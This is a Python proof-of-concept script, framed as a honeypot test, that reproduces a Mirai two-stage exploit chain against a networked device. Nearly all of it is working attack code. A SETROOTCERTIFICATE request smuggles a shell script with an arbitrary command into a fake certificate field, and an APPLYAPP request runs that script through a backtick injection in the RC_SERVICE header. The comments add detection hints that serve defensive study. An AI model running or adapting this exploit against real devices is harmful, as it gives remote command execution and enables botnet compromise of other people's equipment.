#!/usr/bin/env python3
"""
SETROOTCERTIFICATE + APPLYAPP honeypot test — replicates the exact Mirai
two-stage exploit chain

Stage 1: SETROOTCERTIFICATE writes a shell script to /tmp/etc/cert.pem.1
Stage 2: APPLYAPP triggers execution via RC_SERVICE backtick injection
"""

import socket
import ssl
import sys
import time

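# Command-line arguments: target host, target port, and the command string that
# is later spliced into the stage-1 payload. Misuse exits with a non-zero
# status via sys.exit (the bare exit() builtin is provided by the site module
# for interactive use and always returns 0).
if len(sys.argv) < 4:
    print('poc.py ipaddress port "command to run"')
    sys.exit(1)

TARGET_HOST = sys.argv[1]
TARGET_PORT = int(sys.argv[2])  # raises ValueError for a non-numeric port
COMMAND = sys.argv[3]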


def tls_connect(host, port):
    """Open a TCP connection to ``host:port`` and wrap it in client-side TLS.

    Certificate verification is deliberately switched off (no hostname check,
    ``CERT_NONE``): the context accepts any certificate the peer presents, so
    it is only appropriate against lab/honeypot devices. ``server_hostname``
    is still supplied so SNI is sent, but it is not validated.

    Args:
        host: hostname or IP address to connect to.
        port: TCP port.

    Returns:
        An ``ssl.SSLSocket`` whose underlying socket has a 10-second timeout.

    Raises:
        OSError: if the TCP connect or the TLS handshake fails
            (``ssl.SSLError`` and ``socket.timeout`` are both subclasses).
    """
    client_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # check_hostname must be cleared before verify_mode can be set to CERT_NONE.
    client_ctx.check_hostname = False
    client_ctx.verify_mode = ssl.CERT_NONE
    tcp = socket.create_connection((host, port), timeout=10)
    return client_ctx.wrap_socket(tcp, server_hostname=host)


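def send_recv(tls_sock, request_bytes):
    """Send ``request_bytes`` and read the reply until the peer closes.

    The socket is closed before returning in every case, including when
    ``sendall`` raises, so a failed stage does not leave a descriptor open.
    During the read phase a timeout or a reset from the peer is treated as
    end-of-response rather than an error: whatever arrived so far is returned.

    Args:
        tls_sock: a connected socket-like object exposing sendall/recv/close.
        request_bytes: the raw request to send.

    Returns:
        bytes: the concatenated response, possibly empty.

    Raises:
        OSError: from ``sendall`` (any error) or from ``recv`` for errors
            other than a timeout or a connection reset.
    """
    chunks = []
    try:
        tls_sock.sendall(request_bytes)
        try:
            while True:
                chunk = tls_sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except (socket.timeout, ConnectionResetError):
            # Stalled or reset connection: keep what was received so far.
            pass
    finally:
        tls_sock.close()
    # Join once instead of repeated bytes concatenation.
    return b"".join(chunks)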


# Stage 1: Write the payload to /tmp/etc/cert.pem.1
# Request body for SETROOTCERTIFICATE. It is an XML document whose <cert>
# element does not carry a certificate: its text starts with a "#!/bin/sh"
# line, the "#-----BEGIN CERTIFICATE-----" line is a shell comment, and the
# CDATA section holds COMMAND (substituted for the 'command-to-run'
# placeholder by the .replace() below). Detection note: for this PoC the
# <cert> text does not begin with a PEM "-----BEGIN" header, which is an
# easy thing to check for in anything inspecting these requests.
BODY = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>'
    "<content>"
    "<key>-----BEGIN RSA PRIVATE KEY-----id</key>"
    "<cert>#!/bin/sh\n"
    "#-----BEGIN CERTIFICATE-----\n"
    "\n"
    "<![CDATA[command-to-run\n"
    "]]>\n"
    "</cert>"
    "<intermediate_crt>-----BEGIN CERTIFICATE-----</intermediate_crt>"
    "</content>"
).replace('command-to-run',COMMAND)

# Stage-1 request. SETROOTCERTIFICATE is not a standard HTTP method, so the
# method token alone stands out in access logs and IDS rules. The body is the
# XML above; the request is sent as a single UTF-8 byte string.
STAGE1 = (
    f"SETROOTCERTIFICATE /favicon.ico/ HTTP/1.1\r\n"
    f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    f"Connection: close\r\n"
    f"\r\n"
    f"{BODY}"
).encode("utf-8")

# Stage 2: Trigger execution via RC_SERVICE backtick injection
# Stage-2 request, no body. The RC_SERVICE header value is a backtick command
# substitution that runs /etc/cert.pem.1 with sh. APPLYAPP (another
# non-standard method), ACTION_MODE, SET_NVRAM and RC_SERVICE are the fields
# to watch for on the wire; a backtick inside RC_SERVICE is the injection
# marker for this PoC.
STAGE2 = (
    f"APPLYAPP /favicon.ico/ HTTP/1.1\r\n"
    f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n"
    f"ACTION_MODE: apply\r\n"
    f"SET_NVRAM: aa\r\n"
    f"RC_SERVICE: `sh /etc/cert.pem.1`\r\n"
    f"Connection: close\r\n"
    f"\r\n"
).encode("utf-8")

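# Execute the two stages in order. Each stage opens its own TLS connection:
# both requests carry "Connection: close" and send_recv closes the socket
# before returning.
def _run_stage(label, request_bytes):
    """Open a connection, send one stage, and print a trimmed view of the reply.

    Args:
        label: progress line printed before the request is sent.
        request_bytes: the encoded request (STAGE1 or STAGE2).

    Returns:
        bytes: the raw response as returned by send_recv.
    """
    print(label)
    resp = send_recv(tls_connect(TARGET_HOST, TARGET_PORT), request_bytes)
    # Show at most the first 200 decoded characters; undecodable bytes are
    # replaced rather than raising.
    preview = resp.decode("utf-8", errors="replace")[:200]
    print(f"    Response ({len(resp)} bytes): {preview}")
    return resp


resp1 = _run_stage("[*] Stage 1: Writing payload via SETROOTCERTIFICATE...", STAGE1)

# One-second pause between the stages, kept from the original script
# (presumably to let stage 1 finish on the device before stage 2 — unverified).
time.sleep(1)

resp2 = _run_stage("[*] Stage 2: Triggering execution via APPLYAPP RC_SERVICE injection...", STAGE2)

print()
print("[*] Check: for command success or something idk")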